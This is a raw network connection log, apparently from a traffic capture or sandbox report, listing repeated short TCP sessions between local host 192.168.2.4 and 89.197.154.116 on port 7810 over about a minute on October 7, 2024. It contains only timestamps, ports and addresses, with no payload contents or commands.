Oct 7, 2024 22:00:20.715989113 CEST	49741	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:20.720909119 CEST	7810	49741	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:20.843404055 CEST	49745	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:20.848727942 CEST	7810	49745	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:20.849200010 CEST	49745	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:20.849200010 CEST	49745	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:20.854121923 CEST	7810	49745	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:22.559043884 CEST	7810	49745	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:22.559096098 CEST	49745	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:22.605849981 CEST	49745	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:22.610882998 CEST	7810	49745	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:22.718048096 CEST	49747	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:22.722877026 CEST	7810	49747	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:22.722937107 CEST	49747	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:22.724162102 CEST	49747	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:22.729017973 CEST	7810	49747	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:24.295855999 CEST	7810	49747	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:24.295931101 CEST	49747	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:24.296004057 CEST	49747	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:24.300836086 CEST	7810	49747	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:24.404809952 CEST	49748	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:24.410002947 CEST	7810	49748	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:24.410114050 CEST	49748	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:24.410253048 CEST	49748	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:24.415024042 CEST	7810	49748	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:26.003751993 CEST	7810	49748	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:26.003982067 CEST	49748	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:26.003982067 CEST	49748	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:26.009032011 CEST	7810	49748	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:26.122071028 CEST	49749	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:26.127166986 CEST	7810	49749	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:26.127264977 CEST	49749	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:26.127382994 CEST	49749	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:26.132266998 CEST	7810	49749	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:27.766885996 CEST	7810	49749	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:27.767095089 CEST	49749	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:27.767095089 CEST	49749	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:27.772097111 CEST	7810	49749	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:27.872504950 CEST	49750	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:27.877468109 CEST	7810	49750	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:27.877597094 CEST	49750	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:27.877765894 CEST	49750	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:27.883157015 CEST	7810	49750	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:29.450474024 CEST	7810	49750	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:29.450556993 CEST	49750	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:29.450674057 CEST	49750	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:29.455594063 CEST	7810	49750	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:29.560818911 CEST	49751	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:29.565982103 CEST	7810	49751	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:29.566082001 CEST	49751	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:29.566318035 CEST	49751	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:29.571513891 CEST	7810	49751	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:33.574657917 CEST	49751	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:33.576379061 CEST	7810	49751	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:33.576436996 CEST	49751	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:33.962245941 CEST	49752	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:33.967550993 CEST	7810	49752	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:33.967650890 CEST	49752	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:33.967817068 CEST	49752	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:33.973222017 CEST	7810	49752	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:35.545571089 CEST	7810	49752	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:35.545658112 CEST	49752	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:35.545737982 CEST	49752	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:35.550714970 CEST	7810	49752	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:35.653311014 CEST	49753	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:35.658889055 CEST	7810	49753	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:35.658982038 CEST	49753	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:35.659131050 CEST	49753	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:35.664274931 CEST	7810	49753	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:37.247236967 CEST	7810	49753	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:37.247359991 CEST	49753	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:37.260509968 CEST	49753	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:37.265794992 CEST	7810	49753	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:37.376735926 CEST	49754	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:37.381947041 CEST	7810	49754	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:37.382049084 CEST	49754	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:37.382189035 CEST	49754	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:37.387136936 CEST	7810	49754	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:38.969387054 CEST	7810	49754	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:38.969491005 CEST	49754	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:38.969599009 CEST	49754	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:38.974735975 CEST	7810	49754	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:39.075134039 CEST	49755	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:39.080785036 CEST	7810	49755	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:39.080899000 CEST	49755	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:39.081021070 CEST	49755	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:39.085933924 CEST	7810	49755	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:40.675172091 CEST	7810	49755	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:40.675331116 CEST	49755	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:40.675617933 CEST	49755	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:40.680461884 CEST	7810	49755	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:40.779165983 CEST	49756	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:40.785595894 CEST	7810	49756	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:40.785722971 CEST	49756	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:40.785969973 CEST	49756	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:40.792438984 CEST	7810	49756	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:42.358086109 CEST	7810	49756	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:42.358293056 CEST	49756	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:42.367320061 CEST	49756	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:42.372740030 CEST	7810	49756	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:42.484811068 CEST	49757	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:42.490185022 CEST	7810	49757	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:42.490278006 CEST	49757	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:42.490438938 CEST	49757	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:42.495471954 CEST	7810	49757	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:44.092530966 CEST	7810	49757	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:44.092722893 CEST	49757	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:44.092722893 CEST	49757	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:44.097889900 CEST	7810	49757	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:44.200035095 CEST	49758	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:44.205282927 CEST	7810	49758	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:44.205415010 CEST	49758	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:44.205595970 CEST	49758	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:44.210597038 CEST	7810	49758	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:45.812782049 CEST	7810	49758	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:45.812861919 CEST	49758	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:45.815723896 CEST	49758	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:45.821382046 CEST	7810	49758	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:45.928631067 CEST	49759	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:45.934122086 CEST	7810	49759	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:45.934217930 CEST	49759	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:45.939424038 CEST	49759	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:45.944489002 CEST	7810	49759	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:47.535624027 CEST	7810	49759	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:47.535783052 CEST	49759	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:47.535867929 CEST	49759	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:47.543282032 CEST	7810	49759	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:47.639590025 CEST	49760	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:47.644732952 CEST	7810	49760	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:47.644848108 CEST	49760	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:47.645029068 CEST	49760	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:47.650820017 CEST	7810	49760	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:49.272500038 CEST	7810	49760	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:49.272784948 CEST	49760	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:49.272784948 CEST	49760	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:49.277812004 CEST	7810	49760	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:49.388537884 CEST	49761	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:49.393901110 CEST	7810	49761	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:49.394117117 CEST	49761	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:49.394248009 CEST	49761	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:49.399049044 CEST	7810	49761	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:50.988820076 CEST	7810	49761	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:50.988909960 CEST	49761	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:50.988970041 CEST	49761	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:50.993911982 CEST	7810	49761	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:51.091815948 CEST	49762	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:51.276443005 CEST	7810	49762	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:51.276539087 CEST	49762	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:51.276710033 CEST	49762	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:51.281806946 CEST	7810	49762	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:52.881495953 CEST	7810	49762	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:52.881733894 CEST	49762	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:52.881845951 CEST	49762	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:52.887536049 CEST	7810	49762	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:52.998841047 CEST	49763	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:53.004069090 CEST	7810	49763	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:53.004153013 CEST	49763	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:53.004349947 CEST	49763	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:53.010078907 CEST	7810	49763	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:54.576677084 CEST	7810	49763	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:54.576802015 CEST	49763	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:54.582442045 CEST	49763	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:54.587354898 CEST	7810	49763	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:54.684807062 CEST	49764	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:54.689959049 CEST	7810	49764	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:54.690093994 CEST	49764	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:54.690186024 CEST	49764	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:54.695447922 CEST	7810	49764	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:56.263221025 CEST	7810	49764	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:56.263309002 CEST	49764	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:56.263484001 CEST	49764	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:56.268459082 CEST	7810	49764	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:56.372323036 CEST	49765	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:56.377876997 CEST	7810	49765	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:56.377978086 CEST	49765	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:56.378082991 CEST	49765	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:56.382894039 CEST	7810	49765	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:57.971573114 CEST	7810	49765	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:57.971739054 CEST	49765	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:57.971962929 CEST	49765	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:57.976872921 CEST	7810	49765	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:58.076947927 CEST	49767	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:58.082216978 CEST	7810	49767	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:58.082379103 CEST	49767	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:58.082648039 CEST	49767	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:58.087486029 CEST	7810	49767	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:59.680279970 CEST	7810	49767	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:59.680335045 CEST	49767	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:59.681920052 CEST	49767	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:59.686839104 CEST	7810	49767	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:59.794186115 CEST	49769	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:59.799155951 CEST	7810	49769	89.197.154.116	192.168.2.4
Oct 7, 2024 22:00:59.799226046 CEST	49769	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:59.799335957 CEST	49769	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:00:59.804549932 CEST	7810	49769	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:01.395009995 CEST	7810	49769	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:01.395075083 CEST	49769	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:01.395144939 CEST	49769	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:01.399998903 CEST	7810	49769	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:01.497242928 CEST	49780	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:01.673038006 CEST	7810	49780	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:01.673113108 CEST	49780	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:01.673264027 CEST	49780	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:01.678350925 CEST	7810	49780	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:03.285401106 CEST	7810	49780	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:03.285490036 CEST	49780	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:03.285558939 CEST	49780	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:03.290431023 CEST	7810	49780	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:03.389280081 CEST	49791	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:03.394212008 CEST	7810	49791	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:03.394309044 CEST	49791	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:03.394442081 CEST	49791	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:03.399301052 CEST	7810	49791	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:04.986738920 CEST	7810	49791	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:04.987483025 CEST	49791	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:04.987540007 CEST	49791	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:04.992325068 CEST	7810	49791	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:05.090814114 CEST	49807	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:05.095803022 CEST	7810	49807	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:05.095891953 CEST	49807	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:05.096041918 CEST	49807	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:05.101274967 CEST	7810	49807	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:06.689054012 CEST	7810	49807	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:06.689131975 CEST	49807	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:06.689215899 CEST	49807	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:06.694123983 CEST	7810	49807	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:06.794159889 CEST	49818	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:06.799190998 CEST	7810	49818	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:06.799257040 CEST	49818	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:06.799372911 CEST	49818	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:06.804447889 CEST	7810	49818	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:08.658610106 CEST	7810	49818	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:08.658737898 CEST	49818	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:08.658826113 CEST	49818	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:08.660949945 CEST	7810	49818	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:08.661010027 CEST	49818	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:08.664362907 CEST	7810	49818	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:08.764626026 CEST	49825	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:08.770096064 CEST	7810	49825	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:08.770240068 CEST	49825	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:08.770409107 CEST	49825	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:08.775365114 CEST	7810	49825	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:10.359267950 CEST	7810	49825	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:10.359503031 CEST	49825	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:10.359503031 CEST	49825	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:10.364927053 CEST	7810	49825	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:10.467433929 CEST	49840	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:10.472587109 CEST	7810	49840	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:10.472671032 CEST	49840	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:10.472955942 CEST	49840	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:10.477930069 CEST	7810	49840	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:12.084533930 CEST	7810	49840	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:12.084606886 CEST	49840	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:12.084841013 CEST	49840	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:12.090226889 CEST	7810	49840	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:12.200283051 CEST	49851	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:12.205809116 CEST	7810	49851	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:12.206016064 CEST	49851	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:12.206017017 CEST	49851	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:12.211069107 CEST	7810	49851	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:13.796793938 CEST	7810	49851	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:13.796875000 CEST	49851	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:13.796936989 CEST	49851	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:13.801892042 CEST	7810	49851	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:13.921873093 CEST	49857	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:13.927048922 CEST	7810	49857	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:13.927222967 CEST	49857	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:13.927268982 CEST	49857	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:13.932132959 CEST	7810	49857	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:15.534579992 CEST	7810	49857	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:15.534739017 CEST	49857	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:15.534953117 CEST	49857	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:15.540173054 CEST	7810	49857	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:15.637988091 CEST	49868	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:15.643030882 CEST	7810	49868	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:15.643258095 CEST	49868	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:15.643258095 CEST	49868	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:15.648231030 CEST	7810	49868	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:17.252403021 CEST	7810	49868	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:17.252713919 CEST	49868	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:17.252713919 CEST	49868	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:17.257982016 CEST	7810	49868	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:17.358540058 CEST	49879	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:17.363425016 CEST	7810	49879	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:17.363532066 CEST	49879	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:17.363678932 CEST	49879	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:17.368834019 CEST	7810	49879	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:18.941291094 CEST	7810	49879	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:18.941422939 CEST	49879	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:18.942085981 CEST	49879	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:18.947048903 CEST	7810	49879	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:19.046422958 CEST	49894	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:19.283787012 CEST	7810	49894	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:19.283898115 CEST	49894	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:19.284923077 CEST	49894	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:19.290597916 CEST	7810	49894	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:20.872807026 CEST	7810	49894	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:20.873023033 CEST	49894	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:20.873120070 CEST	49894	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:20.878108978 CEST	7810	49894	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:20.981703043 CEST	49906	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:20.986613989 CEST	7810	49906	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:20.987557888 CEST	49906	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:20.987730980 CEST	49906	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:20.992538929 CEST	7810	49906	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:22.591300964 CEST	7810	49906	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:22.591355085 CEST	49906	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:22.591548920 CEST	49906	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:22.596362114 CEST	7810	49906	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:22.716131926 CEST	49918	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:22.721575022 CEST	7810	49918	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:22.721709013 CEST	49918	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:22.721848011 CEST	49918	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:22.726686954 CEST	7810	49918	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:24.295363903 CEST	7810	49918	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:24.295453072 CEST	49918	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:24.295509100 CEST	49918	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:24.300893068 CEST	7810	49918	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:24.404937983 CEST	49931	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:24.409961939 CEST	7810	49931	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:24.411520004 CEST	49931	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:24.411634922 CEST	49931	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:24.416563988 CEST	7810	49931	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:25.983972073 CEST	7810	49931	89.197.154.116	192.168.2.4
Oct 7, 2024 22:01:25.987530947 CEST	49931	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:01:25.987602949 CEST	49931	7810	192.168.2.4	89.197.154.116
